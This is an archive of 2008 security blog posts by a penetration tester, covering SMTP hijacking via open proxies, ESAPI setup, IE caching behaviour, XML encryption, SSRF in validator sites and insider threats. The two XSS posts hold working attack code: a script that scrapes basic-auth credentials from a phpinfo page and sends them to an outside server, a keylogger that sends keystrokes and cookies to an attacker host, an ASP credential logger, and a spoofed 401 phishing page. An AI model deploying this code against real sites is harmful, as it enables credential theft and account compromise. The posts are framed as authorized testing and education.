500 5.3.3 Unrecognized command
500 5.3.3 Unrecognized command
221 2.0.0 ServerUplink1 Service closing transmission channel



In the above example, I was able to get the SMTP server to execute the QUIT command, which of course is pretty benign. I haven't gotten any productive commands executing because I haven't been able to gain complete control over the HTTP request. Apparently, WinHTTP guards against request splitting pretty well :-)

I thought I may have some better luck with PHP, so I hooked up the extremely vulnerable PHP script you see below to test with:
<?
print "Hello world!";
include $_GET['mike'];
?>


The PHP include function can be used to execute PHP inline from local or remote resources. That said, calling vulnProxy.php?mike=http://127.0.0.1:25 will generate the below HTTP request:
GET / HTTP/1.1
Host: 127.0.0.1


Since we are sending the request to port 25, the request will be interpreted by sendmail SMTP. Below are some log entries. I like how sendmail has a clue about open proxies :-)

root@mikezusman log]# tail -f maillog
Mar 26 18:20:47 mikezusman sendmail[22438]: m2QFKldb022438: mikezusman.com [127.0.0.1]: probable open proxy: command=GET /_M HTTP/1.0\r\n

Mar 26 18:20:47 mikezusman sendmail[22438]: m2QFKldb022438: mikezusman.com [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA

Mar 26 19:19:14 mikezusman sendmail[15375]: m2QEu8aC015375: timeout waiting for input from mikezusman.com during server cmd read

Mar 26 19:19:14 mikezusman sendmail[15375]: m2QEu8aC015375: mikezusman.com [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA

Mar 27 00:33:04 mikezusman sendmail[5631]: m2QLX3QR005631: mikezusman.com [127.0.0.1]: probable open proxy: command=GET /_M HTTP/1.0\r\n

Mar 27 00:33:04 mikezusman sendmail[5631]: m2QLX3QR005631: mikezusman.com [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA

Mar 27 03:33:10 mikezusman sendmail[28294]: m2R0X9Mo028294: mikezusman.com [127.0.0.1]: probable open proxy: command=GET / HTTP/1.0\r\n


I had the same trouble with PHP that I did with ASP and Java. I also tested the above scenarios using the Java HttpUrlConnection object and the results were the same. I couldn't get complete control over the request because of built-in input validation. That's not to say it's impossible - I just haven't figured it out yet.

To conclude, in an open proxy situation, the more control over the server generated HTTP request the user has, the more the user will be able to connect to services other than HTTP. The only roadblock to complete SMTP hijacking was the request splitting mitigation built in to the various connection methods I tested. Perhaps there is a way around them that I'm not aware of. If so, I'd love to know about it ( %0D%0A, \r\n didn't work :-). I also wonder if there are any developers out their who do not use these standard methods of generating HTTP requests. I'm sure it would be pretty difficult to roll-your-own and protect yourself against these splitting attacks.

Monday, March 24, 2008

OWASP ESAPI

I've been playing around with the OWASP ESAPI since I volunteered to write some content for the OWASP Java project.

While I always knew that ESAPI was a great concept, now that I've actually used it, I see how robust it is and how much hard work went into it by Jeff Williams and his colleagues.

I like to keep things simple for myself and avoid the use of things like resource intensive IDE's (Eclipse) :-) I just like to write my simple test scripts/programs/servlets in textpad and run/compile things from the command line. That said, getting the ESAPI working took a bit of trial and error.

Once I figured out that I needed to set a system resource in my JRE which points to the location of ESAPI.properties, I was pretty much rocking and rolling. I progressed pretty easily, and as I ran into more road blocks, I realized these were just more objects that needed to be in the same folder as the properties file - such as users.txt (an adhoc user repository). I guess if I used Eclipse properly, this wouldn't be such a hassle.

But I take pride in the fact that I don't rely on any IDE to get my code to compile.

While I plan on working with ESAPI and writing about it more in the future, here is a basic list of what you need to configure to get ESAPI cooking without any IDE nonsense:

1. Download JAR: http://owasp-esapi-java.googlecode.com/files/owasp-esapi-java-1.1.1.jar

2. Install Tomcat & JDK (www.coreservlets.com has a great tutorial if you're new to this)
3. Configure environment:

CATALINA_HOME=c:\bin\tc6\apache-tomcat-6.0.16
JAVA_HOME=c:\program files\java\jdk1.6.0_05
Path=C:\program files\java\jdk1.6.0_05\bin
CLASSPATH=c:\dev\test;c:\program files\java\jdk1.6.0_05\lib;%CATALINA_HOME%\lib\servlet-api.jar;%CATALINA_HOME%\lib\jsp-api.jar;c:\bin\esapi\owasp-esapi-java-1.1.1.jar

4. Edit catalina.bat to include appropriate start up options in JAVA environment:
set JAVA_OPTS=-Dorg.owasp.esapi.resources="/bin/ESAPI"

5. Place ESAPI.property file and users.txt in /bin/ESAPI (or where ever you specify the path to be)

6. Configure some simple servlets that invoke the API (see OWASP ESAPI for some code samples).

Thursday, March 13, 2008

Like Mikey, Internet Explorer will consume anything

Nothing new or too exciting in this post, but I just felt like documenting some IE behavior I've observed.

You might not realize it, but when you visit a web site, you are allowing that site to place all sorts of content on your computer inside your temporary internet cache.
What happens with that content - such as rendering images, launching executables & third party apps, etc - occurs based on decisions your browser makes.

These decisions are based on the content-type of the data sent by the web server, browser security restrictions, and user configurable options such as security zones.
For example, if the content-type of data sent is "image/jpeg", your browser will cache the data and attempt to render it as an image. If the content-type is "application/ms-word", IE will first prompt the user to continue or not. With an affirmative response, IE will cache the file and pass it to Word as a command argument to be opened.

I was curious if I could trick the browser into downloading malicious code without the normal security warnings. The bad news is that this is pretty easy to do. The good news is that it's pretty hard to launch the code! For example, I can configure my web server to respond to a request with a .EXE file and a text/html or image/jpeg content-type. This will cause the browser to download the .EXE, cache it, and attempt to render it in whatever context the HTML specifies.

To check the sanctity of the downloaded .EXE, I attempted to launch it by double-clicking it in the Temporary Internet Files folder within Explorer. Explorer launched IE and tried to render it based on the originally specified content-type. No luck there. Then I just manually copied it out of the temporary folder into c:\. It allowed me to do this, but put a .html extension on the file instead of the original .EXE. So I renamed the copy to .EXE, double clicked it, and it launched.

While this is not horrible on its own, it could help an attacker who already has some access to a target computer and needs a way to get further malware onto the machine. This behavior could possibly allow an attacker to leverage a less severe applet or ActiveX vulnerability allowing you to manipulate client side files into a remote code execution vuln.

This could also be used for malicious purposes in other contexts. Maybe I don't want to execute code on your machine, but I want to frame you by placing questionable content on your system. All I need you to do is visit a web site I control, and then tip-off management that your downloading porn.

Wednesday, March 12, 2008

Web Services Security

I spent the last two days in downtown Manhattan attending Web Services Security training by Gunnar Peterson and TechSmart Solutions Group. It was definitely worth while. I had been of the REST mindset, where I wondered why all the added complexity of web services, WS-Security, SAML, etc, was necessary. I always asked myself why can't we just use HTTP GET's to get things done?

Maybe for some one-off situations REST is fine. But for large scale enterprise deployments, where a given web service request/response may travel over multiple hops, through different organizations, the added complexity has some real value. For example, SAML and federated identity services can make authenticating web service requests across organizational boundaries seamless and reliable. And WS-Security standards for message level encryption allow you to protect the data your trafficking while allowing authorized systems to view message routing information within your SOAP request.

One interesting attack Gunnar speaks about in his training is the "Encrypted Element Known Plain Text Attack". In this attack, if an attacker knows your XSD or DTD , and you encrypt entire XML elements instead of just the data within the element, the attacker can much more easily brute force your encryption.

An example:

XSD:
<xs:element name="Name"...>
<xs:element name="Username"...>
<xs:element name="Password"...>

XML:
<name>Mike</name>
<username>schmoilito</username>
<enc:CipherData><enc:CipherValue>KXN398H3HFH39S3S</enc:CipherValue></enc:CipherData>

In the above situation, the attacker can safely assume that the encrypted value starts with <password> and ends with </password>. I'm no cryptography expert, but I think it is easy to see how this makes the attackers job easier.

In this example, you are better off encrypting less of the XML document, like this:
<name>Mike</name>
<username>schmoilito</username>
<password>
<enc:CipherData><enc:CipherValue>KXN398H3HFH39S3S</enc:CipherValue></enc:CipherData>
</password>

Now, only the password value is encrypted, and your encrypted data is within the password element. The attacker gets no benefit from knowing your XSD.

XML security can be quite versatile. The above example shows the distinction between encrypting an entire element and encrypting just the data, and how encrypting more than you really need to can actually reduce your overall security. In some situations, you may want to encrypt different elements in your document with different keys, such that different systems can read only the data they need to see within the XML.

In short, all this web service stuff is pretty cool. If you can, definitely enroll in one of Gunnars' classes.

Friday, March 7, 2008

我不得到尊敬 (I get no respect)

Finally, a computer security article on CNN that I enjoyed reading.

However, there is one line in the article bothers me. That line would be when James Mulvenon referred to Chinese hackers who break into sensitive US installations without being sanctioned to do so by the Chinese government as "useful idiots." That's why I ripped off a Rodney Dangerfield line to title this post ;-)

Personally, I understand how easily mis-configured systems and systems running bad code can be compromised. But by saying a bored "idiot" is all it takes to compromise the Pentagon, he is really slamming our own personnel and systems in place to protect these critical assets. In showing disrespect for our adversaries, we basically show disrespect for ourselves.

Thursday, March 6, 2008

Stealing Basic Auth with Persistent XSS - Part 2

I found a better way to steal basic auth credentials using XSS, and it uses the same principal as cross site tracing. Basically, you need to get the web server to reflect either the authorization header or the user credentials in its HTML output. Once the data is accessible in the HTML, you can access it using JavaScript, and by-pass the same origin policy.

The mitigating factor here is that servers don't always conveniently do this for you. Fortunately, many PHP applications, including the one I was testing, will have an arbitrary PHP test page somewhere in the web root. These test pages usually use the php_info() function to display server info and confirm to the admin that the machine is functioning.

Among other server config details, the php_info() method also displays the user name and password of the currently logged in user. Here is one example of this script out in the wild. The source is basically:
<?php
php_info();
?>

Drop that source code into a .php file on your server, protect it with basic auth, and then access the script and enter your creds. Scroll down and you will see your credentials in the HTML output.

When you have an XSS vulnerability, you can use XMLHTTP to request the php info URL, parse out the data, and send it off to a server you control. Below is some sample JavaScript to do just this.

function splitit(stringy) {
var cut = stringy.split(' ');
return cut[0]
}

function fetch(url) {

var xmlhttp = false;

try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
xmlhttp = new XMLHttpRequest();
}

xmlhttp.open("GET", xUrl,true);
xmlhttp.onreadystatechange=function() {

if (xmlhttp.readyState==4) {
// return xmlhttp.responseText;
}
}
xmlhttp.send(null);
return xmlhttp.responseText;
}
var resp = fetch('php1.php');
var SplitUser = resp.split('PHP_AUTH_USER"]');
var SplitPass = resp.split('PHP_AUTH_PW"]');
if (SplitUser.length > 1){
var username = splitit(SplitUser[1]);

}
if (SplitPass.length > 1){
var password = splitit(SplitPass[1]);

}
document.images[0].src = 'http://yourserver/kl/logger1.asp?key=' + username + '|' + password;

Tuesday, March 4, 2008

Fun with Persistent XSS

For the past few weeks, I've been doing some pen-testing for a friend, after hours. His client is an Internet business with no staging/qa systems, so I was testing production web apps. For one particular app, we did primarily a black box test where I was given only one set of low privileged credentials.

The application contains links to other applications also protected with basic auth, but for which my creds have no access. I needed to get access to these other apps on other servers, since that's where the juicy data was!

After many hours, the only vuln I could find was some persistent cross-site scripting in a user profile management script. I was allowed to create profiles of people which populate a drop down list in the left hand frame of the site. It was in this list that I could inject arbitrary tags. Since the site relied only on the authorization header to grant access, and not a session cookie, cookie theft and session hijacking was not a feasible option.

My payload: <SCRIPT src="http://myserver.com/script/"></script>
I used a default file (index.asp) to serve the JS content since I had some space limitations to deal with.

I looked into cross-site tracing to try and steal authorization headers, but I couldn't get it to work with JS or client-side VBScript (XMLHTTP/WINHTTP don't let you use trace). I figured the next best tactic would be to launch some more invasive XSS attacks. After confirming the rules of engagement, I was given the OK to start pwning browsers. Awesome!

My first payload consisted of a JavaScript key logger, as well as some code to track user statistics (IP address, what URLs they're visiting, etc). It's at the bottom of this post. There is a lot I could have done here, but rather than try to compromise clients, I focused on just trying to steal user credentials. All I really wanted was access to other applications linked to from this portal.

Once I deployed the initial payload, I found that at that particular time, there was only one user, and he/she wasn't typing anything in the browser. I wasn't logging any key strokes, but I saw the browser requesting one URL over and over again. The URL was a stats page showing how many customers were converting on one of their web sites :-) (Anyone who has ever run an ecommerce site knows what I'm talking about)

Since I couldn't get the authorization header, there were no cookies, and my user wasn't even typing anything, I figured my best shot would be to phish credentials out of him using a spoofed 401 authentication request. I put a script on my web server that prompted the user for credentials while spoofing the realm that the real server used. Using my XSS payload, I could then redirect the main frame of the users browser to my 401 script whenever I wanted.

Since the page was framed, and did not use HTTPS, it would not be immediately obvious that any of my scripts were hosted elsewhere. The authentication prompt did show my web server IP address, but I hoped the user would not notice this subtle detail. I was relying on the the user to enter their credentials into my spoofed basic auth prompt without a second thought.

I waited for the user to come back and start refreshing the stats page. When they did, I modified my JS payload to start redirecting to my spoofed basic auth page. My script logged whatever authorization header was sent back by the web browser, but it never let the user through. Since I was actively monitoring the attack, I would manually disable it to let user through and hopefully not arouse too much suspicion.

The first attempt yeiled Og==. A base64 encoded semi-colon. Since my script was hosted a different domain, the browser did not initially pre-populate anything, and the user just hit enter to submit a blank username and password. The second attempt got me TkyLjE2OC4xLjIwXGpvaG46, which when decoded, was "192.168.1.20\john:". The browser populated the username as the client machine IP and the locally logged on user-name. The user didn't enter a password, and hit submit.

At this point, I was pretty frustrated, so I disabled the 401 prompt, let the user in, and went back to the drawing board. My script was working but the user didn't enter anything. I didn't see a better way to launch this attack, so I just tried a few more times. Eventually, the user entered the same credentials I was initially given to conduct the test. I phished the credentials I already had! They were probably the easiest for the user to obtain, since they had recently been provided to us for the test. Oh well...

My big mistake here was that I assumed the user knew their account credentials. More likely, they entered them once, but checked the box allowing the browser to remember them, so they never had to manually enter them again.

Looking back, rather then attempt to steal credentials, I could have written some JavaScript to proxy HTTP requests to protected resources through this users browser, and send the resulting response data back to me. This would have taken much more time. I'll have to write some code to do that for next time.

Even though I was not completely successful, this was still a fun exercise. It was cool to actually go head to head against one person in real time, and modify my attack on the fly! I don't usually get to do that at my day job...

If anyone has any other ideas on what I could have done differently, feel free to comment. That is, if anyone actually reads this long post. If you still feel like reading, check my code below. Cheers!


JavaScript - not the prettiest, but it got the job done!
<% response.contenttype="text/javascript" %>

function keylogger(e){
document.images[0].src = "http://xxxxxxx/k/logger.asp?key=" + e.keyCode + "&ccookie=" + document.cookie;
};
document.images[0].src = "http://xxxxxxxx/k/logger.asp?key=0&ccookie=BEGIN" + document.cookie;

var browser=navigator.appName;
var b_version=navigator.appVersion;
var version=parseFloat(b_version);
if ((browser=="Microsoft Internet Explorer")&& (version>=4)){
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
//window.status = keylog += String.fromCharCode(k) + '[' + k +']';
document.images[0].src = "http://xxxxxxxxxx/k/logger.asp?key=" + k + "&ccookie=" + document.cookie;
}
parent.frames[1].document.onkeypress = function () {
k = parent.frames[1].window.event.keyCode;
//window.status = keylog += String.fromCharCode(k) + '[' + k +']';
document.images[0].src = "http://xxxxxxxxx/k/logger.asp?key=" + k + "&ccookie=" + document.cookie;
}
}
else
{
document.body.addEventListener("keyup", keylogger, false);
parent.frames[1].document.body.addEventListener("keyup", keylogger, false);
}
// parent.frames[1].document.location = "http://xxxxxxxxxxx/k/auth.asp";
document.images[0].src = "http://xxxxxxxx/k/logger.asp?key=0&ccookie=END" + document.cookie + "%20" + parent.frames[1].document.location.href;



Logger.asp:
<%
strKey = request("key")
httpReferrer = request.servervariables("HTTP_REFERER")
httpCookie = request("ccookie")
x= Logit("d:\logs\keylogger.txt", chr(strKey) & vbtab & httpReferrer &vbtab & httpCookie)

function Logit(strOutputFile, strOutPut)
Dim objFSO, objOutputFile
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objOutputFile = objFSO.OpenTextFile(strOutputFile, 8, True)
objOutputFile.Write now() & vbtab & strOutPut & vbCrLf
objOutputFile.Close
Set objFSO = Nothing
Set objOutputFile = Nothing
end function %>



Auth.asp - Modified to send the user where they want to go after they submit creds.
<%
function Logit(strOutputFile, strOutPut)
Dim objFSO, objOutputFile
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objOutputFile = objFSO.OpenTextFile(strOutputFile, 8, True)
objOutputFile.Write now() & vbtab & strOutPut & vbCrLf
objOutputFile.Close
Set objFSO = Nothing
Set objOutputFile = Nothing
end function

if instr(request.servervariables("ALL_RAW"), "Authorization:") <=0 then x= Logit("d:\logs\credlogger.txt", request.servervariables("ALL_RAW")) response.status = 401 response.addheader "WWW-Authenticate", "Basic realm=""Spoofin yo realmz!""" response.addheader "Server", "Apache/1.3.20 (Unix) PHP/4.2.2" else x= Logit("d:\logs\credlogger.txt", request.servervariables("ALL_RAW")) %>
<script>
document.location.href="http://where the user wants to go";
</script>
<% end if %>

Thursday, February 28, 2008

XMLHTTP, res://, and name look-ups

After reading another one of RSnake's posts about file enumeration using res://, I went back to see how XMLHTTP handles this protocol. It can make for some interesting results if the URI can be controlled by the user.

------------------------------------------------------------

set http = createobject("Msxml2.XMLHTTP")
http.open "GET", "res://cmd.exe"

msxml3.dll error '80070005'
Access is denied.
------------------------------------------------------------
http.open "GET", "res://notepad.exe"

msxml3.dll error '80070715'
The specified resource type cannot be found in the image file.
------------------------------------------------------------
http.open "GET", "res://garbage.exe"

msxml3.dll error '80070002'
The system cannot find the file specified.

------------------------------------------------------------
http.open "GET", "res://shdoclc.dll/IESecHelp.htm"

"Internet Explorer Enhanced Security Configuration places your server and Microsoft Internet Explorer ...."


When a server makes a remote or local request for a user specified resource, there is a lot more going on server-side then you might initially realize. Filemon is a good tool to see what's going when trying to access local files. And of course, Wireshark is fun for seeing what happens when you request remote files.

For example, on a Windows box, specifying http://shortname will cause the server to send out NetBios Name Service (NBNS) UDP broadcasts on its subnet, while requesting http://fqdn.com will get the server to make DNS requests (assuming the host is not in the DNS cache). Clearly, you can get the server to reach out to more machines than just the server hosting the content you're trying to fetch, which means we have more attack vectors to worry about.

Wednesday, February 27, 2008

Insider-threat Evolution

Yesterday at work, we were doing some group threat modeling exercises based on HacMeBank. One of the threats we modeled was that of the theoretical admin portion of the site, for which all admins shared one set of credentials and had free reign over customer data and accounts.

While everyone agreed this was bad, everyone except me said the threat was less severe because employees should be vetted and trusted. Prospective employees go through background checks and other processes before being hired to ensure that they are of the highest moral fiber and good character.

While an employee could be a low threat when they are being indoctrinated to the company, two years later when the adjustable rate on Joe's mortgage kicks in, his wife gets pregnant, and he loses his promotion to Bob, Joe maybe moved to take some drastic steps to ensure the well being of his family. Such as selling the companies consumer data on IRC.

While it is important to thoroughly check out prospective employees during the hiring process, just because you hire them shouldn't mean they get the keys to the kingdom. In many cases, the keys consist literally of encryption keys, as well as application layer functionality.

I tell developers to never trust a user, and a user can be an anonymous web surfer, a paying customer, or an employee. In the same way, the business needs to have a healthy distrust of employees - from the CEO on down to the guys in the mail room, and especially your outsourced third-party developers.
I'm not advocating invading employee privacy with cloak and dagger tactics. I just want businesses to realize the need to invest in security for internal applications, and take the threat just as seriously as most are beginning to take the outside threat. In the same way technology changes and external threats change and evolve, people change, and internal threats can come to exist from entities which were once vetted and trusted.

For more on insider threats, there is a write up currently on security focus about employees abusing privileges in a Wisconsin power company (with links to related stories). And lets not forget Jerome Kerviel, who abused internal systems and policies to rack up an astronomical financial loss for Societe Generale.

Monday, February 25, 2008

Leave Cookies to the Keebler Elves

If you don't know what CSRF is, you can read about it here.

I was talking to some developers today about using tokens and requiring passwords on forms to prevent CSRF. Then my friend Matt asked why can't we just stop using cookies?

If an application doesn't rely on a browser automatically sending cookies for session management, CSRF will be a non issue. Of course, this means that the developers have to handle session management with additional code (those poor souls!). Instead of the browser automatically sending the cookies with each request, the developers need to make sure any link or form action has the session ID in it. We looked at Tomcat, and to some extent, it has the ability to automatically append session identifiers to some URLs (I need to research this more).

Having the session ID in the query string does introduce other risks, such as making it visible in logs on the web server and any intermediate proxy. Right now, I think the benefit of zero CSRF outweighs those risks.

HTTP wasn't designed to be maintain state. Cookies were an after thought, once people realized they needed a way to group multiple requests together into a logical "session".

Unfortunately, Web2.0 gives us much more code executing on the client, all of which relies on the web browser sending cookies with each outgoing request (assuming the receiving code on the app server actually verifies the request are part of a valid session). That said, I don't think we'll see any mass exodus from cookies any time soon.

Updated 2:26PM EST 2/25/2008
I totally forgot about session hijacking attacks, which are a good reason not to rely on session identifiers being sent in URL query-strings. This is where attackers forge links with session ID's in them and trick users into clicking on them and logging in. These attacks could lead to badness worse than that of CSRF.

Updated 9:24PM EST 2/25/2008
Doh! I should have read my last post. Session ID's in the URL are also vulnerable to referer leakage!

(That's what happens when I get to eager to press "publish" and head out to lunch!)

Thursday, February 21, 2008

Leaky Web Browsers

I'm pretty compulsive when it comes to checking out my blog stats in Google analytics, specifically, the referer data. For a while, I'd been mulling over some corporate intranet hosts that were sending clicks through. I Google'd them, but couldn't find out what company they were coming from.

Today I found out.

I was on a conf call with a security vendor who was giving his pitch and demo'ing his software. One part of the tool showed some sample data. Data which contained some internal host names from his corporate intranet. Host names which were on the same domain as the mystery referer in my stats!

Out of respect, I won't shout them out on here. But I do think it goes to show how easy it is to inadvertently leak corporate data. Referer data leaks have been talked about for a while now. I wonder when browsers will allow users to prevent referers from being sent across security zones.

Thanks for the links everone :-)

Tuesday, February 19, 2008

ActiveX and Applet Security

"Designing for security is important because an ActiveX control is particularly vulnerable to attack. An application running on any Web site can use the control; all that it needs is the control's class identifier (CLSID)."
http://msdn2.microsoft.com/en-us/library/aa752035(VS.85).aspx

The threat of malicious web sites abusing ActiveX objects already installed on client PCs is real, as confirmed by the above MSDN article, and numerous published vulnerabilities. In some instances, cached Java applets can be abused in the same way. Depending on what the code does, this problem can lead to some really nasty vulnerabilities in application logic.

An easy way to prevent ActiveX objects and Java applets from being misused by other web sites is to hard code the list of domains allowed to use the object in its own source. Unfortunately, in some cases this is not a feasible solution, as perhaps the code is meant to be hosted on multiple domains. Case in point, the MS RDP activex. Lots of web sites use this control to have a browser embedded remote desktop window.

Since we can't rely on the components to protect themselves from abuse, I think the browser should provide more protection. Why can't the browser sandbox the code such that only the web sites which installed them can actually invoke them? How hard is it to maintain an inventory of installed objects/applets and enforce access control lists for websites? Even in cases where mutltiple sites use the same control, a user controllable white-list could help protect against abuse. Users should be able to white-list web sites which are allowed to use the control, or white-list the control itself for all sites.

One particular Java applet I've analyzed employs a hard coded white list. The purpose of this applet is to launch a server specified executable file on the client computer. If a malicious web site were able to invoke this applet from the browsers cache, it could possibly launch an arbitrary executable. See the below code:

private static final String legalDomains[] = {

".domainA.com", ".domainB.com", ".domainC.com"
};

private boolean IsLegalDomain()
{
String browserDomain = getDocumentBase().getHost();
boolean securityException = false;
for(int i = 0; i <>
{
if(!browserDomain.endsWith(legalDomains[i]))
continue;
securityException = true;
break;
}
return securityException;
}


If the domain returned by the web browser is not in the hard coded white list, the applet will fail securely. Unfortunately, this would not stop a dedicated attacker; it would just force him or her to change their approach.

While this reduces the client side attack surface, it makes the white listed websites more of a target because they are trusted by the client. Without the white list, you could just own the client. With the white list, you need to own the domain in order to own the client. XSS, persistent XSS and other vulns that allow attackers to control site content should allow you to successfully attack the client side code.

Additionally, this opens the door for another client side vulnerability to be leveraged to exploit the vulnerable AX or applet code. DNS spoofing and CSRF based router attacks that lead to client DNS setting compromise can both lead to malicious code being hosted under trusted, white listed domains.

It is nothing new that client side code such as applets and AX objects greatly increase client side attack surface. What scares me is that it doesn't seem like software vendors are any less hesitant to use them. In fact, from the research I've been doing, it seems that vendors would generally opt for enhanced client side functionality (like auto launching EXE's) at the expense of security.

Friday, February 15, 2008

Internet Facing SEO/Validator Sites vulnerable to Intranet Hacking

While looking for additional data to progress the development of my WebSite Intranet Scanning tool based on RSnake's original paper on Intranet hacking through web sites, I hit the jackpot in terms of finding sites that appear to be vulnerable.

SEO (search engine optimization) site scanners and html/xml/etc page validators generally allow anonymous users to specify URI's to be scanned and validated. Unfortunately, almost NONE of these sites I found appear to validate these user supplied URI's before fetching and performing whatever analysis they do.

Some screen shots for your viewing pleasure.
The first site allowed us to scan http://127.0.0.1 revealing all sorts of good stuff about whats running on the server, as well as the fact that cPanel control panel is hosted on this address.

Since these sites work by sending a simple HTTP GET for the user specified URI, we could probably leverage known cPanel vulnerabilities against this site, and possibly own the box from the inside.

The second screen shot is from another site and shows more of the same.

What is really interesting about these sites versus the ones I've found before is that many of them actually spit the content back out at you. I'd been focusing on using timing to determine if hosts/ports are listening, but these applications will give you the content served, or if the host is not up, give you a nice error message saying so.

I thought about responsibly disclosing these problems to the web site owners, but I'd be doing that until my fingers fall off since there are so many of them. So consider this my responsible disclosure.

How can this be prevented? Easy: validate user supplied input. Don't allow users to submit URI's with 127.0.0.1, localhost, and addresses in your local address space. It's probably not too hard to make a decent white list regex to allow FQDN's and public IP ranges.

Some sites actually did block the request. Funnier still, some sites with multiple scanners/validators had mixed results, with one scanner being vulnerable and another not.

Thursday, February 14, 2008

IIS Remote Exploit

MS08-006 is a treat we haven't had in a while: a remotely exploitable code execution vuln in IIS. To be fair, the remotely exploitable part requires that an ASP script be written in such a way that it allows user supplied input to be passed to a vulnerable function. That said, it is still pretty cool.

HD Moore has a great write up detailing how he reverse engineered the MS08-006 patch using IDA Pro & BinDiff to find the actual vulnerability. I'm sure a handful of people out there have done the same, but it is pretty cool to see a blow by blow account of how it is actually done.

Tuesday, February 12, 2008

EMail 101

Originally, I started off this post by complaining that people don't understand the value of their data. Unfortunately, this morning I realized that we're even further jammed behind the eight ball then I originally thought. People still don't understand the power of email.

I checked my corporate email this morning to find that someone spammed thousands of people asking if we would have sushi in one of our cafeterias this Friday. How did this happen? The notorious "Reply All" button. On top of that, two messages later, was the convenient "so and so wishes to recall a message" message. Now I have two extraneous emails in my inbox. When I click on the recall message, it goes away, but I'm still left with the original spam. Sweet.

Last week I read an article about an information leakage snafu that happened between two law firms working on a high profile case against Eli Lily, brought on by the US DoJ.

A lawyer (lawyer A) from one law firm tried to email a sensitive document to a co-counsel (lawyer B) who worked for a different law firm. The co-counsel shared the same last name as a NY Times reporter who also happened to be in lawyer A's address book. Instead of emailing the document to lawyer B, lawyer A inadvertently gave the NY Times reporter the scoop on a big settlement Eli Lilly was about to make with the US DoJ.

This situation could have been prevented if lawyer A had the forethought and awareness to realize that maybe this document should be encrypted. Even if it was sent to the correct recipient, it is possible that the document could be viewed by others en-route to the destination mail box.

But thats how a security guy thinks.

Regular users like lawyer A don't even think to look at who is in the "to" and "cc" fields before they send email, let alone worry about whether or not data should be encrypted.

One idea I have for a technical control to force people to think about the email they are about to send is to place a daily limitation on the number of emails one person can send. I know the only time some people think about cleaning old messages off the email server is when they are not allowed to send any more outgoing messages.

If you were only allowed to send 5 corporate email messages per day, you'd better make sure you really need to send a particular message. Hopefully, it would also make people think twice about the content and the recipient list.

On top of that, perhaps making PGP or S/MIME encryption a default for sending outgoing messages would help increase awareness about handling sensitive data. Alerting users when they are plaintext emailing someone who they don't have the required certificates might give them pause when sending.

If users can't be trusted to use email responsibly, it is up to administrators to put controls in place.

Wednesday, February 6, 2008

WhiteHat Security NJ Lunch

I just got back from the WhiteHat Security lunch event here in NJ. It was really cool to meet Jeremiah Grossman, and together with my colleague Daniel, the three of us had a fun discussion about CSRF & DNS rebinding.

The first part of the presentation was delivered by Jeremiah, as he went over the Top 10 web Hacks of 2007. He crammed alot of technical content into 35 minutes, but it was very well organized and he did a good job of simplifying the content. I think a lot of audience was non-technical, but I always think it's good for those folks to get a healthy dose of reality explained to them. I also picked up some technical details I had previously not realized.

The second part was a presentation by a WhiteHat partner company called SecurView. They offer outsourced, managed security solutions, one of which is WhiteHat's Sentinel. SecurView makes an argument that security talent and expertise is hard to recruit and retain, so outsourcing is the way to go. That doesn't make sense to me, since won't it be just as hard for SecurView to recruit and retain from the same limited pool of security talent?

If you don't have the resources to hire and retain security talent, I think the best thing a company can do is bring in consultants to help them build their security infrastructure in house. Outsourcing may seem like a cheap alternative, but you sacrifice control and need to place a lot of confidence and faith (trust) in the outsourcer, and who ever they subsequently outsource to. Case in point, SecurView mentioned that they use co-location centers for hosting to keep costs down. How do you you know the colo company is doing things right?

I think what it comes down to isn't risk transference, but blame transference. A company who can't get a handle on security themselves might be willing to pay a premium and place their trust in a company who claims to provide secure services. This way, if they get hacked, it's the fault of the outsourcer.

The final part of the event was an overview of the Sentinel service from WhatHat's VP of Sales. I've always thought this service is a cool idea, and I'd really like to see what it looks like from a client perspective. Sentinel is a hybrid service, that combines technology (a scanner) and people in an interative process that develops knowledge of how an application works to be able to more effectively find vulnerabilities. The operations folks at WhiteHat add a human element to the scanner, as they manually follow up on scanner findings and act as a reference point for clients who need more info.

All in the all, the food was good (and free!), and the subject matter discussed was very interesting to me. If you have the time, I would recommend checking WhiteHat out the next time they come around.